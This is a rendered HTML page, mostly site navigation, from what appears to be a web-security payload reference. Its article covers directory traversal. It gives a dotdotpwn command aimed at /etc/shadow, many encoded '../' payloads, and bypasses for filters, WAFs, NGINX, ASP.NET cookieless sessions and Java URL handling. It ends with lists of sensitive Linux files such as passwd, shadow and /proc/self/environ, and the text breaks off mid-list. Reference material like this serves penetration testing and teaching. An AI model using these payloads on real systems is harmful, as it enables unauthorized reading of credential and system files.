<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_2" >
<label class="md-nav__link" for="__nav_51_2" id="__nav_51_2_label" tabindex="0">
<span class="md-ellipsis">
CVE Ffmpeg HLS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_2">
<span class="md-nav__icon md-icon"></span>
CVE Ffmpeg HLS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS/" class="md-nav__link">
<span class="md-ellipsis">
FFmpeg HLS vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_3" >
<label class="md-nav__link" for="__nav_51_3" id="__nav_51_3_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_3">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess upload
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_4" >
<label class="md-nav__link" for="__nav_51_4" id="__nav_51_4_label" tabindex="0">
<span class="md-ellipsis">
Configuration Busybox httpd.conf
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_4">
<span class="md-nav__icon md-icon"></span>
Configuration Busybox httpd.conf
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf/" class="md-nav__link">
<span class="md-ellipsis">
Index
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_5" >
<label class="md-nav__link" for="__nav_51_5" id="__nav_51_5_label" tabindex="0">
<span class="md-ellipsis">
Configuration uwsgi.ini
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_5">
<span class="md-nav__icon md-icon"></span>
Configuration uwsgi.ini
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20uwsgi.ini/" class="md-nav__link">
<span class="md-ellipsis">
uWSGI configuration file
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_6" >
<label class="md-nav__link" for="__nav_51_6" id="__nav_51_6_label" tabindex="0">
<span class="md-ellipsis">
Extension Flash
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_6">
<span class="md-nav__icon md-icon"></span>
Extension Flash
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Extension%20Flash/" class="md-nav__link">
<span class="md-ellipsis">
Index
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_7" >
<label class="md-nav__link" for="__nav_51_7" id="__nav_51_7_label" tabindex="0">
<span class="md-ellipsis">
Extension PDF JS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_7">
<span class="md-nav__icon md-icon"></span>
Extension PDF JS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Extension%20PDF%20JS/" class="md-nav__link">
<span class="md-ellipsis">
Generate PDF File Containing JavaScript Code
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_8" >
<label class="md-nav__link" for="__nav_51_8" id="__nav_51_8_label" tabindex="0">
<span class="md-ellipsis">
Picture ImageMagick
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_8">
<span class="md-nav__icon md-icon"></span>
Picture ImageMagick
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Picture%20ImageMagick/" class="md-nav__link">
<span class="md-ellipsis">
ImageMagick Exploits
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_9" >
<label class="md-nav__link" for="__nav_51_9" id="__nav_51_9_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_9">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSS%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/XSS%20with%20Relative%20Path%20Overwrite/" class="md-nav__link">
<span class="md-ellipsis">
XSS with Relative Path Overwrite - IE 8/9 and lower
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" >
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#basic-exploitation" class="md-nav__link">
<span class="md-ellipsis">
Basic exploitation
</span>
</a>
<nav class="md-nav" aria-label="Basic exploitation">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#16-bits-unicode-encoding" class="md-nav__link">
<span class="md-ellipsis">
16 bits Unicode encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#utf-8-unicode-encoding" class="md-nav__link">
<span class="md-ellipsis">
UTF-8 Unicode encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-replaced-by" class="md-nav__link">
<span class="md-ellipsis">
Bypass "../" replaced by ""
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-with" class="md-nav__link">
<span class="md-ellipsis">
Bypass "../" with ";"
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#double-url-encoding" class="md-nav__link">
<span class="md-ellipsis">
Double URL encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#unc-bypass" class="md-nav__link">
<span class="md-ellipsis">
UNC Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#nginxalb-bypass" class="md-nav__link">
<span class="md-ellipsis">
NGINX/ALB Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#aspnet-cookieless-bypass" class="md-nav__link">
<span class="md-ellipsis">
ASPNET Cookieless Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#java-bypass" class="md-nav__link">
<span class="md-ellipsis">
Java Bypass
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#path-traversal" class="md-nav__link">
<span class="md-ellipsis">
Path Traversal
</span>
</a>
<nav class="md-nav" aria-label="Path Traversal">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#interesting-linux-files" class="md-nav__link">
<span class="md-ellipsis">
Interesting Linux files
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#interesting-windows-files" class="md-nav__link">
<span class="md-ellipsis">
Interesting Windows files
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<h1 id="directory-traversal">Directory Traversal</h1>
<blockquote>
<p>Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.</p>
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#tools">Tools</a></li>
<li><a href="#basic-exploitation">Basic exploitation</a><ul>
<li><a href="#16-bits-unicode-encoding">16 bits Unicode encoding</a></li>
<li><a href="#utf-8-unicode-encoding">UTF-8 Unicode encoding</a></li>
<li><a href="#bypass--replaced-by-">Bypass "../" replaced by ""</a></li>
<li><a href="#bypass--with-">Bypass "../" with ";"</a></li>
<li><a href="#double-url-encoding">Double URL encoding</a></li>
<li><a href="#unc-bypass">UNC Bypass</a></li>
<li><a href="#nginxalb-bypass">NGINX/ALB Bypass</a></li>
<li><a href="#aspnet-cookieless-bypass">ASPNET Cookieless Bypass</a></li>
</ul>
</li>
<li><a href="#path-traversal">Path Traversal</a><ul>
<li><a href="#interesting-linux-files">Interesting Linux files</a></li>
<li><a href="#interesting-windows-files">Interesting Windows files</a></li>
</ul>
</li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/wireghoul/dotdotpwn">dotdotpwn - https://github.com/wireghoul/dotdotpwn</a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">://</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">wireghoul</span><span class="p">/</span><span class="n">dotdotpwn</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="n">perl</span> <span class="n">dotdotpwn</span><span class="p">.</span><span class="n">pl</span> <span class="n">-h</span> <span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span> <span class="n">-m</span> <span class="n">ftp</span> <span class="n">-t</span> <span class="n">300</span> <span class="o">-f</span> <span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="n">shadow</span> <span class="n">-s</span> <span class="n">-q</span> <span class="n">-b</span>
</code></pre></div></li>
</ul>
<h2 id="basic-exploitation">Basic exploitation</h2>
<p>We can use the <code>..</code> characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="p">../</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="p">..\</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="p">..\/</span>
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="k">%</span><span class="n">2e</span><span class="k">%</span><span class="n">2e</span><span class="k">%</span><span class="n">2f</span>
<a id="__codelineno-1-5" name="__codelineno-1-5" href="#__codelineno-1-5"></a><span class="k">%</span><span class="n">252e</span><span class="k">%</span><span class="n">252e</span><span class="k">%</span><span class="n">252f</span>
<a id="__codelineno-1-6" name="__codelineno-1-6" href="#__codelineno-1-6"></a><span class="k">%</span><span class="n">c0</span><span class="k">%</span><span class="n">ae</span><span class="k">%</span><span class="n">c0</span><span class="k">%</span><span class="n">ae</span><span class="k">%</span><span class="n">c0</span><span class="k">%</span><span class="n">af</span>
<a id="__codelineno-1-7" name="__codelineno-1-7" href="#__codelineno-1-7"></a><span class="k">%</span><span class="n">uff0e</span><span class="k">%</span><span class="n">uff0e</span><span class="k">%</span><span class="n">u2215</span>
<a id="__codelineno-1-8" name="__codelineno-1-8" href="#__codelineno-1-8"></a><span class="k">%</span><span class="n">uff0e</span><span class="k">%</span><span class="n">uff0e</span><span class="k">%</span><span class="n">u2216</span>
</code></pre></div>
<h3 id="16-bits-unicode-encoding">16 bits Unicode encoding</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="p">.</span> <span class="p">=</span> <span class="k">%</span><span class="n">u002e</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="p">/</span> <span class="p">=</span> <span class="k">%</span><span class="n">u2215</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="p">\</span> <span class="p">=</span> <span class="k">%</span><span class="n">u2216</span>
</code></pre></div>
<h3 id="utf-8-unicode-encoding">UTF-8 Unicode encoding</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="p">.</span> <span class="p">=</span> <span class="k">%</span><span class="n">c0</span><span class="k">%</span><span class="n">2e</span><span class="p">,</span> <span class="k">%</span><span class="n">e0</span><span class="k">%</span><span class="n">40</span><span class="k">%</span><span class="n">ae</span><span class="p">,</span> <span class="k">%</span><span class="n">c0ae</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="p">/</span> <span class="p">=</span> <span class="k">%</span><span class="n">c0</span><span class="k">%</span><span class="n">af</span><span class="p">,</span> <span class="k">%</span><span class="n">e0</span><span class="k">%</span><span class="n">80</span><span class="k">%</span><span class="n">af</span><span class="p">,</span> <span class="k">%</span><span class="n">c0</span><span class="k">%</span><span class="n">2f</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="p">\</span> <span class="p">=</span> <span class="k">%</span><span class="n">c0</span><span class="k">%</span><span class="n">5c</span><span class="p">,</span> <span class="k">%</span><span class="n">c0</span><span class="k">%</span><span class="n">80</span><span class="k">%</span><span class="n">5c</span>
</code></pre></div>
<h3 id="bypass-replaced-by">Bypass "../" replaced by ""</h3>
<p>Sometimes you encounter a WAF which remove the <code>../</code> characters from the strings, just duplicate them.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="p">..././</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="p">...\.\</span>
</code></pre></div>
<h3 id="bypass-with">Bypass "../" with ";"</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="p">..;/</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="n">http</span><span class="p">://</span><span class="n">domain</span><span class="p">.</span><span class="n">tld</span><span class="p">/</span><span class="n">page</span><span class="p">.</span><span class="n">jsp</span><span class="k">?</span><span class="n">include</span><span class="p">=..;/..;/</span><span class="n">sensitive</span><span class="p">.</span><span class="n">txt</span>
</code></pre></div>
<h3 id="double-url-encoding">Double URL encoding</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="p">.</span> <span class="p">=</span> <span class="k">%</span><span class="n">252e</span>
<a id="__codelineno-6-2" name="__codelineno-6-2" href="#__codelineno-6-2"></a><span class="p">/</span> <span class="p">=</span> <span class="k">%</span><span class="n">252f</span>
<a id="__codelineno-6-3" name="__codelineno-6-3" href="#__codelineno-6-3"></a><span class="p">\</span> <span class="p">=</span> <span class="k">%</span><span class="n">255c</span>
</code></pre></div>
<p><strong>e.g:</strong> Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with <code>http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini</code></p>
<h3 id="unc-bypass">UNC Bypass</h3>
<p>An attacker can inject a Windows UNC share ('\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="p">\\</span><span class="n">localhost</span><span class="p">\</span><span class="n">c</span><span class="p">$\</span><span class="n">windows</span><span class="p">\</span><span class="n">win</span><span class="p">.</span><span class="n">ini</span>
</code></pre></div>
<h3 id="nginxalb-bypass">NGINX/ALB Bypass</h3>
<p>NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
<code>http://nginx-server/../../</code> will return a 400 bad request.</p>
<p>To bypass this behaviour just add forward slashes in front of the url:
<code>http://nginx-server////////../../</code></p>
<h3 id="aspnet-cookieless-bypass">ASPNET Cookieless Bypass</h3>
<p>When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.</p>
<p>For example, a typical URL might be transformed from: <code>http://example.com/page.aspx</code> to something like: <code>http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx</code>. The value within <code>(S(...))</code> is the Session ID. </p>
<p>We can use this behavior to bypass filtered URLs.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="p">/</span><span class="n">admin</span><span class="p">/(</span><span class="n">S</span><span class="p">(</span><span class="n">X</span><span class="p">))/</span><span class="n">main</span><span class="p">.</span><span class="n">aspx</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="p">/</span><span class="n">admin</span><span class="p">/</span><span class="n">Foobar</span><span class="p">/(</span><span class="n">S</span><span class="p">(</span><span class="n">X</span><span class="p">))/../(</span><span class="n">S</span><span class="p">(</span><span class="n">X</span><span class="p">))/</span><span class="n">main</span><span class="p">.</span><span class="n">aspx</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="p">/(</span><span class="n">S</span><span class="p">(</span><span class="n">X</span><span class="p">))/</span><span class="n">admin</span><span class="p">/(</span><span class="n">S</span><span class="p">(</span><span class="n">X</span><span class="p">))/</span><span class="n">main</span><span class="p">.</span><span class="n">aspx</span>
</code></pre></div>
<h3 id="java-bypass">Java Bypass</h3>
<p>Bypass Java's URL protocol</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="n">url</span><span class="p">:</span><span class="n">file</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="n">url</span><span class="p">:</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">8080</span>
</code></pre></div>
<h2 id="path-traversal">Path Traversal</h2>
<h3 id="interesting-linux-files">Interesting Linux files</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="n">issue</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a><span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="n">shadow</span>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a><span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="nb">group</span>
<a id="__codelineno-10-5" name="__codelineno-10-5" href="#__codelineno-10-5"></a><span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="n">hosts</span>
<a id="__codelineno-10-6" name="__codelineno-10-6" href="#__codelineno-10-6"></a><span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="n">motd</span>
<a id="__codelineno-10-7" name="__codelineno-10-7" href="#__codelineno-10-7"></a><span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="n">mysql</span><span class="p">/</span><span class="n">my</span><span class="p">.</span><span class="n">cnf</span>
<a id="__codelineno-10-8" name="__codelineno-10-8" href="#__codelineno-10-8"></a><span class="p">/</span><span class="n">proc</span><span class="p">/[</span><span class="n">0</span><span class="p">-</span><span class="n">9</span><span class="p">]*/</span><span class="n">fd</span><span class="p">/[</span><span class="n">0</span><span class="p">-</span><span class="n">9</span><span class="p">]*</span> <span class="p">(</span><span class="n">first</span> <span class="n">number</span> <span class="n">is</span> <span class="n">the</span> <span class="n">PID</span><span class="p">,</span> <span class="n">second</span> <span class="n">is</span> <span class="n">the</span> <span class="n">filedescriptor</span><span class="p">)</span>
<a id="__codelineno-10-9" name="__codelineno-10-9" href="#__codelineno-10-9"></a><span class="p">/</span><span class="n">proc</span><span class="p">/</span><span class="n">self</span><span class="p">/</span><span class="n">environ</span>
